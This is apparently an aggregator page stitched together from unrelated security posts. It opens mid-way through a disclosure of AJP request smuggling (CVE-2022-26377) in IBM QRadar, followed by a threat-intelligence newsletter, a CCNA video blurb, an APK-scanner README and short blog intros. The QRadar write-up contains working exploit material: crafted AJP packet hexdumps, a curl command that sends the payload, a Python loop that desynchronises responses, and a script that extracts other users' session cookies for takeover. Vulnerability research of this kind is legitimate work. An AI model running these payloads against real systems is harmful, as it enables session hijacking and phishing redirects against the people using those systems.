000000b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000c0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000d0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000e0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000f0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000100: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000110: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000120: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000130: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000140: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000150: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000160: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000170: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000180: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000190: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001c0: 2f2f 2f2f 2f2f 2f2f 2f2f 000a 001f 6a61  //////////....ja
000001d0: 7661 782e 7365 7276 6c65 742e 696e 636c  vax.servlet.incl
000001e0: 7564 652e 7061 7468 5f69 6e66 6f00 0010  ude.path_info...
000001f0: 2f57 4542 2d49 4e46 2f77 6562 2e78 6d6c  /WEB-INF/web.xml
00000200: 00ff

After firing the PoC, we were unable to retrieve the web.xml file as expected. However, we were quick to notice after firing it a few times in quick succession that there's a variation between responses, with some returning a 302 status code and some a 403.

A typical response looks something like this:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 01:48:11 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=C7714302E58A4565A3FAA7B786325D93; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-store, max-age=0
Location: /console/core/jsp/Main.jsp;jsessionid=C7714302E58A4565A3FAA7B786325D93
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Expires: Sun, 10 Mar 2024 01:48:11 GMT

And a differential response:

HTTP/1.1 403 403
Date: Sun, 10 Mar 2024 02:12:13 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Content-Length: 0
Cache-Control: max-age=1209600
Expires: Sun, 24 Mar 2024 02:12:13 GMT
X-Frame-Options: SAMEORIGIN

Using tcpdump, we can observe that our single HTTP request has indeed resulted in two AJP request packets being sent to the AJP backend. The two requests are as follows:

  • The legitimate AJP request triggered by our initial HTTP request, and,
  • The smuggled request

Put simply - this makes a lot of sense - we’re definitely smuggling a request here.

At this point, we were much more interested in the variation in response status codes - what is going on here?


Let’s take stock of what we’re observing:

  • One HTTP request results in two AJP Packets being sent to the backend
  • Somehow, HTTP Responses are being returned out of sync

Our first point is enough to arrive at the conclusion that we’ve found an instance of CVE-2022-26377. The (at the time of performing our research) up-to-date version of QRadar (7.5.0 UP7) is definitely vulnerable, since a single HTTP request can smuggle an additional AJP packet.

Our journey doesn’t end here, though. It never does.

Bugs are fun, but to assess real-world impact, we need to dive into how this can be exploited by a threat actor and determine the real risk.

Godzilla Vs Goliath(?)


So, the big question - it seems we've confirmed CVE-2022-26377, and excitingly we can now split one HTTP request into two AJP requests. But, zzz - how is CVE-2022-26377 actually exploitable in the context of QRadar?

In the previous real-world example of CVE-2022-26377 being exploited against F5, AJP packets were being parsed by additional Java functionality, which allowed authentication to be bypassed via the smuggled AJP packet with additional values injected into it.

We spent some time diving through the console application exposed by IBM QRadar, looking for scenarios similar to the F5. However, we came up short on functionality that would let us escalate our level of authentication via just a single injected AJP packet.

Slightly exasperated by this, our next course of action can be expressed via the following quote, taken from the researchers behind the original F5 BigIP vulnerability:

We then leveraged our advanced pentesting skills and re-ran the curl command several times, because sometimes vulnerability research is doing the same thing multiple times and somehow getting different results

As much as we like to believe that computers are magic - we have been informed via TikTok that this is not the case, and something more mundane is happening here. We noticed the application began to β€˜break’, and responses were, in fact, unsynchronized. While this sounds strange - this is a relatively common artefact around request smuggling-class vulnerabilities.

When we say β€˜desynchronized’, we mean that the normal β€œcause-and-effect” flow of a web application, or the HTTP protocol, no longer applies.

Usually, there is a very simple flow to web requests - the user makes a request, and the server issues a corresponding response. Even if two users make requests simultaneously, the server keeps the requests separate, keeping them neatly queued up and ensuring the correct user only ever sees responses for the requests they have issued. Something about the magic of TCP.

However, in the case of QRadar, since a single HTTP request results in two AJP requests, we are generating an imbalance in the number of responses created. This confuses things, and as the response queue is out of sync with the request queue, the server may erroneously respond with a response intended for an entirely different user.
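A crude way to watch this happen in your own lab is to drive the earlier curl invocation in a loop and tally the status codes that come back; once the queues drift, the mix of 302s and 403s (and, eventually, other users' responses) becomes obvious. Below is a minimal Python sketch, assuming curl is on the PATH, pay.txt is the payload shown earlier, and the placeholder host is replaced with an instance you are authorised to test.

import subprocess
from collections import Counter

CURL = [
    "curl", "-k", "-s", "-o", "/dev/null", "-w", "%{http_code}",
    "https://<qradar-host>/console/",
    "-H", "Transfer-Encoding: chunked, chunked",
    "--data-binary", "@pay.txt",
]

counts = Counter()
for _ in range(20):
    status = subprocess.run(CURL, capture_output=True, text=True).stdout.strip()
    counts[status] += 1

print(counts)  # e.g. Counter({'302': 17, '403': 3}) once responses start to desynchronise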

This is known as a DeSync Attack, for which there is some amount of public research in the context of HTTP, but relatively little concerning AJP.

But, how can we abuse this in the context of IBM's QRadar?

Anyway, tangent time

Well, where would life be without some random vulnerabilities that we find along the way?

When making a request to the console application with a doctored HTTP request 'Host' header, we can observe that QRadar trusts this value and uses it to construct values used within the Location HTTP response header - commonly known as a Host Header Injection vulnerability. Fairly common, but for the sake of completeness - here’s a request and response to show the issue:

Request:

GET /console/watchtowr HTTP/1.1
Host: watchtowr.com

Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:16:55 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=74779EA7C7827A53BD474F884657CDA6; Path=/; Secure; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://watchtowr.com:443/console/logon.jsp?loadback=76edfcc6-4a57-496e-a03c-ea2e8a50ffb6
Content-Length: 0
X-Frame-Options: SAMEORIGIN

It’s a very minor vulnerability, if you could even call it that - in practice, what good is a redirect that requires modification of the Host HTTP request header in a request sent by the victim? In almost all cases imaginable, this is completely useless.

Is this one of the vanishingly rare instances where it is useful?

Well, well, well…

Typically, with vulnerabilities that involve poisoning of responses, we have to look for gadgets to chain them with to escalate the magnitude of an attack - tl;dr what can we do to demonstrate impact.

Can we take something harmless, and make it harmful? Perhaps we can take the β€˜useless’ Host Header Injection β€˜vulnerability’ discussed above, and turn it into something fruitful.

It turns out, by formatting this Host Header Injection request into an AJP forwarding packet and sending it to the QRadar instance using our AJP smuggling technique, we can turn it into a site-wide exploit - hitting any user that is lucky(!) enough to be using QRadar.

Groan..

Below is a correctly formatted AJP Forward Request packet (note the use of B's to pad the packet out to the correct size). This AJP packet emulates an HTTP request leveraging the Host Header Injection discussed above.

We will smuggle this packet in, and observe the result. Once the queues are desynchronised, the response will be served to other users of the application, and since we control the Location response header, we can cause the unsuspecting user to be redirected to a host of our choosing.

00000000: 0008 4854 5450 2f31 2e31 0000 0b2f 636f  ..HTTP/1.1.../co
00000010: 6e73 6f6c 652f 7878 0000 0931 3237 2e30  nsole/xx...127.0
00000020: 2e30 2e31 0000 026c 6f00 0007 6c6f 6361  .0.1...lo...loca
00000030: 6c78 7400 0050 0000 0300 0154 0000 2042  lxt..P.....T.. B
00000040: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000050: 4242 4242 4242 4242 4242 4242 4242 4200  BBBBBBBBBBBBBBB.
00000060: 000a 5741 5443 4854 4f57 5230 0000 0130  ..WATCHTOWR0...0
00000070: 00a0 0b00 0d77 6174 6368 746f 7772 2e63  .....watchtowr.c
00000080: 6f6d 0003 0062 6262 6262 0005 0162 6262  om...bbbbb...bbb
00000090: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000000f0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000100: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000110: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000120: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000130: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000140: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000150: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000160: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000170: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000180: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
00000190: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001a0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001b0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001c0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001d0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001e0: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
000001f0: 6262 6262 6262 6262 6262 6262 6265 3d00  bbbbbbbbbbbbbe=.
00000200: ff00
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \
		--data-binary @payload.txt

Poisoned Response:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 02:35:06 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Set-Cookie: JSESSIONID=E3D8AB1D2D6B3267BE9FB3BF3FFAD9C0; Path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://watchtowr.com:80/console/logon.jsp?loadback=44d7c786-522d-4bc2-90be-f1eac249da3c
Content-Length: 0
X-Frame-Options: SAMEORIGIN

What are we seeing here?

Well, after a few attempts, the server has started to serve the poisoned response to other users of the application - even authenticated users - who are then redirected via the Location we control.

This is a clear case of CVE-2022-26377 in an exploitable manner; we can redirect all application users to an external host. Exploitation of this by a threat actor is only limited by their imagination; we can easily conjure up a likely attack scenario.

Picture a Blue Team operator logging in to their favourite QRadar instance after receiving a few of their favourite alerts, warning them of potential ransomware being deployed across their favourite infrastructure. Imagine them desperately looking for their favourite β€˜patient zero’ and hoping to nip their favourite threat actors' campaign in the bud.

While navigating through their dashboards, however, an attacker uses this vulnerability to silently redirect them to a β€˜fake’ QRadar instance, mirroring their own instance - but instead of those all-important alerts - all is quiet in this facade QRadar instance, and nothing is reported.

The poor Blue Team Operator goes for their lunch, confident there is no crisis - while in reality, their domain is compromised with malicious GPOs carrying the latest cryptolocker malware.

Before they even realise what's going on, it's too late; the damage is done.

In case you need a little more convincing, here’s a short video clip of the exploit taking place:

Proof of Concept

At watchTowr, we no longer publish Proof of Concepts. We heard the tweets, we heard the comments - we were making it too easy for defensive teams to build detection artefacts for these vulnerabilities contextualised to their environment.

So instead, we've decided to do something better - that's right! We're proud to release the first of many to come of our Python-based, dynamic detection artefact generator tools.

https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc

DeSync Responses

So, we've shown a pretty scary exploitation scenario - but it turns out we can take things even further if we apply a little creativity (ha ha, who knew that watchTowr would ever take things too far 😜).

At this point, the HTTP response queue is in tatters, with authenticated responses being returned to unauthenticated users - that's right, we can leak privileged information from your QRadar SIEM, the heart of your security stack, to unauthenticated users with this vulnerability.

Well, let’s take an extremely brief look into how QRadar handles sessions.

Importantly, in QRadar’s design, each user's session values need to be refreshed relatively often - every few minutes. This is a security mechanism designed to expire values quickly, in case they are inadvertently exposed. Ironically however, we can use these as a powerful exploitation primitive, since they can be returned to unauthenticated users if the response queue is, in technical terms, "rekt". Which, at this point, it is.

Here’s how a session refresh looks:

HTTP/1.1 200 200
Date: Sun, 10 Mar 2024 02:53:34 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=CE0279DC02A0715BB41358EC44A7F546; Path=/; Secure; HttpOnly
Set-Cookie: QRadarCSRF=083a2ebb-7d42-4e56-b4a9-728843f6958e; Path=/; Secure
Set-Cookie: AJAXTimeoutLimit=5; Path=/; Secure
Set-Cookie: SEC=03de6b43-8454-469a-8d40-076f6d12a13d; Path=/; Secure; HttpOnly
Set-Cookie: inactivityTimeout=30; Path=/; Secure
Set-Cookie: lastClickTime=2024-03-10T02:53Z; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Length: 1045
Connection: close

If the above isn't sufficiently clear: the session credentials for authenticated users are returned in an HTTP response, and thus, in the context of this vulnerability, these same values can be returned to unauthenticated users.

If you follow our leading words, this would allow threat actors (or watchTowr's automation) to assume the session of the user and take control of their QRadar SIEM instance in a single request.
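To illustrate how little post-processing that takes, here is a minimal Python sketch that pulls the interesting Set-Cookie values (the cookie names are taken from the session-refresh response above) out of whatever desynchronised response a client happens to capture; raw_response is simply a placeholder for that captured text.

import re

INTERESTING = ("JSESSIONID", "SEC", "QRadarCSRF")

def extract_session(raw_response: str) -> dict:
    # Collect interesting Set-Cookie values from a captured (desynchronised) HTTP response.
    cookies = {}
    for name, value in re.findall(r"Set-Cookie: (\S+?)=([^;\r\n]+)", raw_response):
        if name in INTERESTING:
            cookies[name] = value
    return cookies

Replaying those values against the console is then left as an exercise for the (authorised, lab-bound) reader.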

Flagship security software from IBM.

Once again, exploitation is in the hands of creative threat actors; how could this be further exploited in a real-world attack?

Imagine your first day as the new Blue Team lead in a Fortune 500 organisation; you want to show off to your new employer, demonstrating all the latest threat-hunting techniques.

You’ve got your QRadar instance at hand, you’ve got agent deployment across the organisation, and you have the all-important logs to sort through and subject to your creative rulesets.

You authenticate to QRadar, and hammer away like the pro defender you are. However, a threat actor quietly DeSync’s your instance, and your session data starts to leak. They authenticate to your QRadar instance as if they were you and begin to snoop on your activities.


A quick peek into the ingested raw logs reveals cleartext Active Directory credentials submitted by service accounts across the board. Who's hunting whom now?

The threat actor's campaign is just beginning, and the race to compromise the organisation started the moment you logged into your QRadar. Good job on your first day.

Thanks IBM!

Tl;dr how bad is this

To sum up the impact the vulnerability has, in the context of QRadar, from an unauthenticated perspective:

  • An unauthenticated attacker gains the ability to poison responses of authenticated users
  • An unauthenticated attacker gains the ability to redirect users to an external domain:
    • For example, the external domain could imitate the QRadar instance in a Phishing attack to garner cleartext credentials
  • An unauthenticated attacker gains the ability to cause a Denial-Of-Service in the QRadar instance and interrupt ongoing security operations
  • An unauthenticated attacker gains the ability to retrieve responses of authenticated users
    • Observe ongoing security operations
    • Extract logs from endpoints and devices feeding data to the QRadar instance
    • Obtain session data from authenticated users and administrators and authenticate with this data.

Conclusion

Hopefully, this post has shown you that as an industry we still cannot even do the basics - let alone a listed, too-big-to-fail technology vendor.

While threats will continue to evolve in ways that compound our timelines and day jobs, and state-sponsored actors will keep trying to slip backdoors into OpenSSH - that doesn't mean we get to ignore the... very basics.

To see such an omission from a vendor of security software, in their flagship security product - in our opinion, this is disappointing.

Usual advice applies - patch, pray that IBM now knows to update dependencies, and see what happens next time.

AtΒ watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about theΒ watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Timeline

Date Detail
3rd January 2024 Vulnerability discovered
17th January 2024 Vulnerabilities disclosed to IBM PSIRT
17th January 2024 IBM responded and assigned the internal tracking reference "ADV0108871"
25th January 2024 watchTowr hunted through clients' attack surfaces for impacted systems and communicated with those affected
26th March 2024 IBM issued a security bulletin utilising the identifier CVE-2022-26377 - https://www.ibm.com/support/pages/node/7145265
12th April 2024 Blogpost and PoC released to public

The internet is already scary enough without April Fool’s jokes

11 April 2024 at 18:00

I feel like over the past several years, the "holiday" that is April Fool's Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you'd find on a news site any day of the week.

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it's in "celebration" of a "holiday."

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games.Β 

But at least from what I saw on April 1 of this year, no one tried to "get" anyone with an April Fool's joke about a ransomware actor requesting payment in the form of "Fortnite" in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (though, as it turns out, smart pillows do exist!).

We're already dealing with digitally manipulated photos of "Satanic McDonalds," Twitter's AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos, and more that I hesitate to even make up.

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.Β Β 

The one big thing

Talos discovered a new threat actor we're calling "CoralRaider" that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims' credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file, and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe.

Why do I care?

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country that is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets' social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account.

So now what?

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don't know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default - macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here.

Top security headlines of the week

The security community is still reflecting on the "What If" of the XZ backdoor that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly by accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user's SSH connection and secretly run their own code on that user's machine. The incident is highlighting networking's reliance on open-source projects, which are often provided few resources and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters)

AT&T now says that more than 51 million users were affected by a data breach that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as "MajorNelson." AT&T's notification to affected customers stated that, "The [exposed] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information was related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch)

Another ransomware group claims they've stolen data from United HealthCare, though there is little evidence yet to prove their claim. Change Healthcare, a subsidiary of United, was recently hit with a massive data breach, causing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters)

Can't get enough Talos?

Upcoming events where you can find Talos

Botconf (April 23 - 26)

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3)

Arlington, Virginia

Over the past year, we've observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent States (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns, detailing the commodity and custom-built malware employed by the actor, their discovery, and the evolution of their tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9)

San Francisco, California

Most prevalent malware files from Talos telemetry over the past week

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0
MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

SHA 256: abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6
MD5: 22ae85259273bc4ea419584293eda886
Typical Filename: KMSAuto++ x64.exe
Claimed Product: KMSAuto++
Detection Name: W32.File.MalParent

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Kmsauto::1201

SHA 256: b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31
MD5: 2fb86be791b4bb4389e55df0fec04eb7
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: W32.File.MalParent

SHA 256: 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681
MD5: f1fe671bcefd4630e5ed8b87c9283534
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: PUA.Win.Tool.Hackkms::1201

Are you ready for the CCNA exam? Test yourself with these questions | Cyber Work Hacks

By: Infosec
11 April 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CCNA exam! For today's Hack, Wilfredo Lanz, Infosec bootcamp instructor in charge of Cisco's CCNA certification, works through four sample CCNA questions, explaining each answer option and ruling out the wrong ones, allowing you to reach the right answer in a logical and stress-free way. And the only way you're going to see it is by staying right here for this Cyber Work Hack!

0:00 - CCNA exam sample questions
1:31 - Different types of CCNA exam questions
3:34 - First CCNA exam sample question
8:34 - Second CCNA exam sample question
13:52 - Third CCNA exam sample question
20:47 - Fourth CCNA exam sample question
25:22 - Infosec CCNA boot camp practice exam
27:04 - Advice for CCNA exam day
28:46 - Outro

Learn more about the CCNA: https://www.infosecinstitute.com/training/ccna/

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

πŸ’Ύ

APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R
11 April 2024 at 12:30


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following commands:

For Linux

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the command below. Specify the APK file with the -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan, you can use the command below. Specify the source code of the Android application with the -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan, you can pass the -report argument as shown below.

python3 APKDeepLens.py -apk file.apk -report
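For the CI/CD integration mentioned in the features above, one simple option is to wrap the CLI in a small script and fail the pipeline when the scan itself fails. The sketch below just shells out to the documented -apk/-report invocation; note that treating a non-zero exit code as a failed check is an assumption on our part, not behaviour documented here.

import subprocess
import sys

def scan(apk_path: str) -> int:
    # Run APKDeepLens against an APK and return its exit code (assumed non-zero on failure).
    cmd = ["python3", "APKDeepLens.py", "-apk", apk_path, "-report"]
    return subprocess.run(cmd).returncode

if __name__ == "__main__":
    sys.exit(scan(sys.argv[1] if len(sys.argv) > 1 else "app.apk"))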

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)


Rust for C Developers Part 0: Introduction

By: wumb0
10 April 2024 at 17:37

Hello! It's been a while. Life has been very busy in the past few years, and I haven't posted as much as I've intended to. Isn't that how these things always go? I've got a bit of time to breathe, so I'm going to attempt to start a weekly(ish) blog series inspired by my friend scuzz3y. This series is going to be about Rust, specifically how to write it if you're coming from a lower level C/C++ background.

When I first learned Rust, I tried to write it like I was writing C. That caused me a lot of pain and suffering at the hands of both the compiler and the unsafe keyword. Since then, I have learned a lot about how to write better Rust code that not only makes more sense, but that is far less painful and requires less unsafe overall. If you already know Rust, hopefully this series teaches you a thing or two that you did not already know. If you're new to Rust, then I hope this gives you a good head start in transitioning your projects from C/C++ to Rust (or at least in considering it).

I'm going to target this series towards Windows, but many of the concepts can be used on other platforms as well.

Some of the topics I'm going to cover include (in no particular order):

  • Working with raw bytes
  • C structures and types
  • Shellcoding
  • Extended make (cargo-make)
  • Sane error handling
  • Working with native APIs
  • Working with pointers
  • Inline ASM
  • C/C++ interoperability
  • Building python modules
  • Inline ASM and naked functions
  • Testing

If you have suggestions for things you'd like me to write about/cover, shoot me a message at [email protected].

Expect the first post next week. It will be on working with pointers.


Vulnerability in some TP-Link routers could lead to factory reset

10 April 2024 at 16:56

Cisco Talos' Vulnerability Research team has disclosed 10 vulnerabilities over the past three weeks, including four in a line of TP-Link routers, one of which could allow an attacker to reset the devices' settings back to the factory default.

A popular open-source software for internet-of-things (IoT) and industrial control systems (ICS) networks also contains multiple vulnerabilities that could be used to arbitrarily create new files on the affected systems or overwrite existing ones.

